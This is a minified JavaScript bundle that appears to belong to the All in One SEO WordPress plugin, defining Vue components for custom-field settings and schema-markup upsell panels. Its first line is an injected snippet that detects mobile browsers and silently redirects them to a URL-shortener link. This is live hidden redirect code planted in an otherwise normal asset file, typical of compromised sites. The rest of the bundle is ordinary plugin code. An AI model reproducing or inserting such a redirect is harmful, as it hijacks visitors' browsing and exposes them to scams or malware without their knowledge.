(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{c as h,h as C}from"./app-core.c8323d51.js";import{B as O}from"./Textarea.2495325b.js";import{C as B}from"./Blur.dea2904a.js";import{C as T}from"./SettingsRow.7bec777f.js";import{C as w}from"./Index.e286637f.js";import{a as y,_ as e}from"./vendor-other.39e59221.js";import{f as u,i as f,a0 as n,R as a,v as l,j as P,U as m,ae as d,aq as c,Q as k,M as x}from"./vendor-vue-ui.232c7c36.js";import{B as F}from"./RadioToggle.11796642.js";import{_ as j}from"./_plugin-vue_export-helper.eefbdd86.js";const q={class:"aioseo-sa-ct-custom-fields lite"},V={class:"aioseo-description"},Y={__name:"CustomFields",props:{type:{type:String,required:!0},object:{type:Object,required:!0}},setup(i){const r="all-in-one-seo-pack",t={customFields:e("Custom Fields",r),customFieldsDescription:e("List of custom field names to include as post content for tags and the SEO Page Analysis. Add one per line.",r),ctaDescription:y(e("%1$s %2$s gives you advanced customizations for our page analysis feature, letting you add custom fields to analyze.",r),"AIOSEO","Pro"),ctaButtonText:e("Unlock Custom Fields",r),ctaHeader:y(e("Custom Fields is a %1$s Feature",r),"PRO")};return(p,s)=>(u(),f("div",q,[n(l(B),null,{default:a(()=>[n(l(T),{name:t.customFields,align:""},{content:a(()=>[n(l(O),{"min-height":200}),P("div",V,m(t.customFieldsDescription),1)]),_:1},8,["name"])]),_:1}),n(l(w),{"cta-link":l(h).getPricingUrl("custom-fields","custom-fields-upsell",`${i.object.name}-post-type`,"liteUpgrade"),"button-text":t.ctaButtonText,"learn-more-link":l(h).getUpsellUrl("custom-fields",i.object.name,"liteUpgrade")},{"header-text":a(()=>[d(m(t.ctaHeader),1)]),description:a(()=>[d(m(t.ctaDescription),1)]),_:1},8,["cta-link","button-text","learn-more-link"])]))}},o="all-in-one-seo-pack",D={components:{BaseRadioToggle:F,CoreBlur:B,CoreSettingsRow:T,Cta:w},props:{type:{type:String,required:!0},object:{type:Object,required:!0}},data(){return{links:h,schemaTypes:[{value:"none",label:e("None",o)},{value:"Article",label:e("Article",o)}],strings:{schemaType:e("Schema Type",o),articleType:e("Article Type",o),article:e("Article",o),blogPost:e("Blog Post",o),newsArticle:e("News Article",o),ctaDescription:e("Easily generate unlimited schema markup for your content to help you rank higher in search results. Our schema validator ensures your schema works out of the box.",o),ctaButtonText:e("Unlock Schema Markup Generator",o),ctaHeader:y(e("Schema Markup Generator is a %1$s Feature",o),"PRO")},features:[e("Unlimited Schema",o),e("Validate with Google",o),e("Increase Rankings",o),e("Additional Schema Types",o)]}},methods:{getSchemaTypeOption(i){return this.schemaTypes.find(r=>r.value===i)}}},N={class:"aioseo-sa-ct-schema-lite"};function R(i,r,t,p,s,b){const g=c("base-select"),_=c("core-settings-row"),A=c("base-radio-toggle"),U=c("core-blur"),v=c("cta");return u(),f("div",N,[n(U,null,{default:a(()=>[n(_,{name:s.strings.schemaType,align:""},{content:a(()=>[n(g,{size:"medium",class:"schema-type",options:s.schemaTypes,modelValue:b.getSchemaTypeOption("Article")},null,8,["options","modelValue"])]),_:1},8,["name"]),n(_,{name:s.strings.articleType,align:""},{content:a(()=>[n(A,{name:`${t.object.name}articleType`,modelValue:"BlogPosting",options:[{label:s.strings.article,value:"Article"},{label:s.strings.blogPost,value:"BlogPosting"},{label:s.strings.newsArticle,value:"NewsArticle"}]},null,8,["name","options"])]),_:1},8,["name"])]),_:1}),n(v,{"cta-link":s.links.getPricingUrl("schema-markup","schema-markup-upsell",null,"liteUpgrade"),"button-text":s.strings.ctaButtonText,"learn-more-link":s.links.getUpsellUrl("schema-markup",null,"liteUpgrade"),"feature-list":s.features},{"header-text":a(()=>[d(m(s.strings.ctaHeader),1)]),description:a(()=>[d(m(s.strings.ctaDescription),1)]),_:1},8,["cta-link","button-text","learn-more-link","feature-list"])])}const S=j(D,[["render",R]]),L={setup(){return{licenseStore:C()}},components:{Schema:S,SchemaLite:S},props:{type:{type:String,required:!0},object:{type:Object,required:!0},options:{type:Object,required:!0},showBulk:Boolean}},E={class:"aioseo-sa-ct-schema-view"};function H(i,r,t,p,s,b){const g=c("schema",!0),_=c("schema-lite");return u(),f("div",E,[p.licenseStore.isUnlicensed?x("",!0):(u(),k(g,{key:0,type:t.type,object:t.object,options:t.options,"show-bulk":t.showBulk},null,8,["type","object","options","show-bulk"])),p.licenseStore.isUnlicensed?(u(),k(_,{key:1,type:t.type,object:t.object,options:t.options,"show-bulk":t.showBulk},null,8,["type","object","options","show-bulk"])):x("",!0)])}const Z=j(L,[["render",H]]);export{Z as S,Y as _};
